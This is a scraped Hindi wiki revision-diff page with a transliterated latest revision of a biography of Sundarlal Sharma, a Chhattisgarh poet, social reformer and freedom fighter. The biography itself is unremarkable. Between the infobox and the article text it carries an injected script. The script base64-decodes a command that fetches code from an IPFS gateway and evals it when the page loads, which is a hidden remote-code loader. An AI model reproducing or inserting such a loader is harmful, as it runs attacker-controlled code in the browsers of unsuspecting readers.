Difference between revisions of "सुन्दरलाल शर्मा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "अविभावक" to "अभिभावक")
 
Line 33: Line 33:
 
|अद्यतन=
 
|अद्यतन=
 
}}
 
}}
 
+
'''सुन्दरलाल शर्मा''' ([[अंग्रेज़ी]]: ''Sundarlal Sharma'', जन्म- [[21 दिसम्बर]], [[1881]], [[राजिम]], [[छत्तीसगढ़]]; मृत्यु- [[28 दिसम्बर]], [[1940]]) बहुमुखी प्रतिभा के धनी, सामाजिक क्रांति के अग्रदूत तथा छत्तीसगढ़ राज्य में जनजागरणकर्ता थे। वे एक [[कवि]], सामाजिक कार्यकर्ता, समाज सेवक, [[इतिहासकार]] तथा स्वतंत्रता-संग्राम सेनानी थे। उन्हें 'छत्तीसगढ़ का गाँधी' की उपाधि दी गई है। छत्तीसगढ़ में इनके नाम पर ही '[[पण्डित सुन्दरलाल शर्मा मुक्त विश्वविद्यालय]]' की स्थापना की गई है।
'''सुन्दरलाल शर्मा''' ([[अंग्रेज़ी]]: ''Sundarlal Sharma'' ; जन्म- [[21 दिसम्बर]], [[1881]], [[राजिम]], [[छत्तीसगढ़]]; मृत्यु- [[28 दिसम्बर]], [[1940]]) बहुमुखी प्रतिभा के धनी, सामाजिक क्रांति के अग्रदूत तथा छत्तीसगढ़ राज्य में जन जागरणकर्ता थे। वे एक [[कवि]], सामाजिक कार्यकर्ता, समाज सेवक, [[इतिहासकार]] तथा स्वतंत्रता-संग्राम सेनानी थे। उन्हें 'छत्तीसगढ़ का गाँधी' की उपाधि दी गई है। छत्तीसगढ़ में इनके नाम पर ही '[[पण्डित सुन्दरलाल शर्मा मुक्त विश्वविद्यालय]]' की स्थापना की गई है।
 
 
==जन्म तथा शिक्षा==
 
==जन्म तथा शिक्षा==
 
बहुमुखी प्रतिभा के धनी सुन्दरलाल शर्मा जी का जन्म [[21 दिसम्बर]], [[1881]] ई. को [[छत्तीसगढ़]] की धार्मिक नगरी [[राजिम]] के निकट [[महानदी]] के तट पर बसे [[ग्राम]] चंद्रसूर में हुआ था। इनकी स्कूली शिक्षा प्राथमिक स्तर तक हुई। आगे की शिक्षा इन्होंने घर पर ही स्वाध्याय से प्राप्त की थी। सुन्दरलाल शर्मा ने [[संस्कृत]], [[बांग्ला भाषा|बांग्ला]] तथा [[उड़िया भाषा|उड़िया]] आदि भाषाएं भी सीख ली थीं।<ref name="aa">{{cite web |url= http://www.cgculture.in/SAMMAN/SammanPtsundarlalSharma.html|title=पण्डित सुन्दरलाल शर्मा सम्मान|accessmonthday= 09 दिसम्बर|accessyear= 2014|last= |first= |authorlink= |format= |publisher=सीजीसीकल्चर.इन|language= हिन्दी}}</ref>
 
बहुमुखी प्रतिभा के धनी सुन्दरलाल शर्मा जी का जन्म [[21 दिसम्बर]], [[1881]] ई. को [[छत्तीसगढ़]] की धार्मिक नगरी [[राजिम]] के निकट [[महानदी]] के तट पर बसे [[ग्राम]] चंद्रसूर में हुआ था। इनकी स्कूली शिक्षा प्राथमिक स्तर तक हुई। आगे की शिक्षा इन्होंने घर पर ही स्वाध्याय से प्राप्त की थी। सुन्दरलाल शर्मा ने [[संस्कृत]], [[बांग्ला भाषा|बांग्ला]] तथा [[उड़िया भाषा|उड़िया]] आदि भाषाएं भी सीख ली थीं।<ref name="aa">{{cite web |url= http://www.cgculture.in/SAMMAN/SammanPtsundarlalSharma.html|title=पण्डित सुन्दरलाल शर्मा सम्मान|accessmonthday= 09 दिसम्बर|accessyear= 2014|last= |first= |authorlink= |format= |publisher=सीजीसीकल्चर.इन|language= हिन्दी}}</ref>
Line 42: Line 41:
 
19वीं सदी के अंतिम चरण में देश में राजनैतिक और सांस्कृतिक चेतना की लहरें उठ रही थीं। समाज सुधारकों, चिंतकों तथा देशभक्तों ने परिवर्तन के इस दौर में समाज को नयी सोच और दिशा दिलाने में महत्त्वपूर्ण भूमिका निभाई थी। [[छत्तीसगढ़]] में सुन्दरलाल शर्मा ने सामाजिक चेतना का स्वर घर-घर पहुंचाने में अविस्मरणीय कार्य किया। वे 'राष्ट्रीय कृषक आंदोलन', 'मद्यनिषेध', 'आदिवासी आंदोलन', 'स्वदेशी आंदोलन' से जुड़े और स्वतंत्रता के यज्ञवेदी पर अपना सर्वस्व न्यौछावर कर दिया।<ref name="aa"/>
 
19वीं सदी के अंतिम चरण में देश में राजनैतिक और सांस्कृतिक चेतना की लहरें उठ रही थीं। समाज सुधारकों, चिंतकों तथा देशभक्तों ने परिवर्तन के इस दौर में समाज को नयी सोच और दिशा दिलाने में महत्त्वपूर्ण भूमिका निभाई थी। [[छत्तीसगढ़]] में सुन्दरलाल शर्मा ने सामाजिक चेतना का स्वर घर-घर पहुंचाने में अविस्मरणीय कार्य किया। वे 'राष्ट्रीय कृषक आंदोलन', 'मद्यनिषेध', 'आदिवासी आंदोलन', 'स्वदेशी आंदोलन' से जुड़े और स्वतंत्रता के यज्ञवेदी पर अपना सर्वस्व न्यौछावर कर दिया।<ref name="aa"/>
  
[[छत्तीसगढ़]] के ग्रामीण अंचलों में व्याप्त रुढ़िवादिता, अंधविश्वास, अस्पृश्यता तथा कुरीतियों को दूर करने के लिए पण्डित सुन्दरलाल शर्मा ने अथक प्रयास किया। उनके हरिजनोद्धार कार्य की प्रशंसा [[महात्मा गाँधी]] ने मुक्त कंठ से करते हुए इस कार्य में इन्हें अपना गुरू माना था। [[1920]] ई. में [[धमतरी]] के पास 'कंडेल नहर सत्याग्रह' इनके नेतृत्व में ही सफल रहा था। इनके प्रयासों से ही महात्मा गाँधी [[20 दिसम्बर]], 1920 को पहली बार [[रायपुर]] आए थे।
+
[[छत्तीसगढ़]] के ग्रामीण अंचलों में व्याप्त रुढ़िवादिता, अंधविश्वास, अस्पृश्यता तथा कुरीतियों को दूर करने के लिए पण्डित सुन्दरलाल शर्मा ने अथक प्रयास किया। उनके हरिजनोद्धार कार्य की प्रशंसा [[महात्मा गाँधी]] ने मुक्त कंठ से करते हुए इस कार्य में इन्हें अपना गुरू माना था। [[1920]] ई. में [[धमतरी]] के पास 'कंडेल नहर सत्याग्रह' इनके नेतृत्व में ही सफल रहा था। इनके प्रयासों से ही महात्मा गाँधी [[20 दिसम्बर]], [[1920]] को पहली बार [[रायपुर]] आए थे।
 
====जेलयात्रा====
 
====जेलयात्रा====
 
पण्डित सुन्दरलाल शर्मा '[[असहयोग आन्दोलन]]' के दौरान छत्तीसगढ़ से जेल जाने वाले व्यक्तियों में प्रमुख थे।
 
पण्डित सुन्दरलाल शर्मा '[[असहयोग आन्दोलन]]' के दौरान छत्तीसगढ़ से जेल जाने वाले व्यक्तियों में प्रमुख थे।
Line 55: Line 54:
 
[[Category:स्वतन्त्रता सेनानी]][[Category:सामाजिक कार्यकर्ता]][[Category:कवि]][[Category:इतिहासकार]][[Category:जीवनी साहित्य]][[Category:प्रसिद्ध व्यक्तित्व]][[Category:चरित कोश]][[Category:प्रसिद्ध व्यक्तित्व कोश]]
 
[[Category:स्वतन्त्रता सेनानी]][[Category:सामाजिक कार्यकर्ता]][[Category:कवि]][[Category:इतिहासकार]][[Category:जीवनी साहित्य]][[Category:प्रसिद्ध व्यक्तित्व]][[Category:चरित कोश]][[Category:प्रसिद्ध व्यक्तित्व कोश]]
 
__INDEX__
 
__INDEX__
__NOTOC__
 

Latest revision as of 05:14, 21 December 2017

sundaralal sharma
poora nam sundaralal sharma
janm 21 disambar, 1881
janm bhoomi rajim, chhattisagadh
mrityu 28 disambar, 1940
nagarikata bharatiy
prasiddhi svatantrata senani, samajik karyakarta
dharm hindoo
jel yatra ap 'asahayog andolan' ke dauran chhattisagadh se jel jane vale vyaktiyoan mean pramukh the.
bhasha jnan sanskrit, baangla tatha u diya adi.
rachanaean pandit sundaralal sharma ne hindi tatha chhattisagadhi mean lagabhag 18 granthoan ki rachana ki thi, jisamean 'chhattisagadhi dan-lila' unaki charchit kriti thi.
any janakari chhattisagadh shasan ne sundaralal sharma ki smriti mean sahity/aanchilek sahity ke lie 'pandit sundaralal sharma samman' sthapit kiya hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sundaralal sharma (aangrezi: Sundarlal Sharma, janm- 21 disambar, 1881, rajim, chhattisagadh; mrityu- 28 disambar, 1940) bahumukhi pratibha ke dhani, samajik kraanti ke agradoot tatha chhattisagadh rajy mean janajagaranakarta the. ve ek kavi, samajik karyakarta, samaj sevak, itihasakar tatha svatantrata-sangram senani the. unhean 'chhattisagadh ka gaandhi' ki upadhi di gee hai. chhattisagadh mean inake nam par hi 'pandit sundaralal sharma mukt vishvavidyalay' ki sthapana ki gee hai.

janm tatha shiksha

bahumukhi pratibha ke dhani sundaralal sharma ji ka janm 21 disambar, 1881 ee. ko chhattisagadh ki dharmik nagari rajim ke nikat mahanadi ke tat par base gram chandrasoor mean hua tha. inaki skooli shiksha prathamik star tak huee. age ki shiksha inhoanne ghar par hi svadhyay se prapt ki thi. sundaralal sharma ne sanskrit, baangla tatha u diya adi bhashaean bhi sikh li thian.[1]

lekhan kary

sundaralal sharma apani kishoravastha se hi kavita, lekh tatha natak adi ki rachana karane lage the. ve bharatiy samaj mean vyapt kuritiyoan ko mitane ke lie shiksha ke prachar-prasar ko avashyak samajhate the. ve hindi bhasha ke sath chhattisagadhi ko bhi kafi mahatv dete the. pandit sundaralal sharma ne hindi tatha chhattisagadhi mean lagabhag 18 granthoan ki rachana ki, jisamean 'chhattisagadhi dan-lila' unaki charchit kriti thi.

yogadan

19vian sadi ke aantim charan mean desh mean rajanaitik aur saanskritik chetana ki laharean uth rahi thian. samaj sudharakoan, chiantakoan tatha deshabhaktoan ne parivartan ke is daur mean samaj ko nayi soch aur disha dilane mean mahattvapoorn bhoomika nibhaee thi. chhattisagadh mean sundaralal sharma ne samajik chetana ka svar ghar-ghar pahuanchane mean avismaraniy kary kiya. ve 'rashtriy krishak aandolan', 'madyanishedh', 'adivasi aandolan', 'svadeshi aandolan' se ju de aur svatantrata ke yajnavedi par apana sarvasv nyauchhavar kar diya.[1]

chhattisagadh ke gramin aanchaloan mean vyapt rudhivadita, aandhavishvas, asprishyata tatha kuritiyoan ko door karane ke lie pandit sundaralal sharma ne athak prayas kiya. unake harijanoddhar kary ki prashansa mahatma gaandhi ne mukt kanth se karate hue is kary mean inhean apana guroo mana tha. 1920 ee. mean dhamatari ke pas 'kandel nahar satyagrah' inake netritv mean hi saphal raha tha. inake prayasoan se hi mahatma gaandhi 20 disambar, 1920 ko pahali bar rayapur ae the.

jelayatra

pandit sundaralal sharma 'asahayog andolan' ke dauran chhattisagadh se jel jane vale vyaktiyoan mean pramukh the.

nidhan

sundaralal sharma jivan-paryant sada jivan, uchch vichar ke adarsh ka palan karate rahe. sadaiv samaj seva mean rat rahane aur atyadhik parishram ke karan sharir kshin ho gaya aur 28 disambar, 1940 ko inaka dehavasan hua. chhattisagadh shasan ne unaki smriti mean sahity/aanchilek sahity ke lie 'pandit sundaralal sharma samman' sthapit kiya hai.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. 1.0 1.1 1.2 pandit sundaralal sharma samman (hindi) sijisikalchar.in. abhigaman tithi: 09 disambar, 2014.

sanbandhit lekh

  1. REDIRECTsaancha:svatantrata senani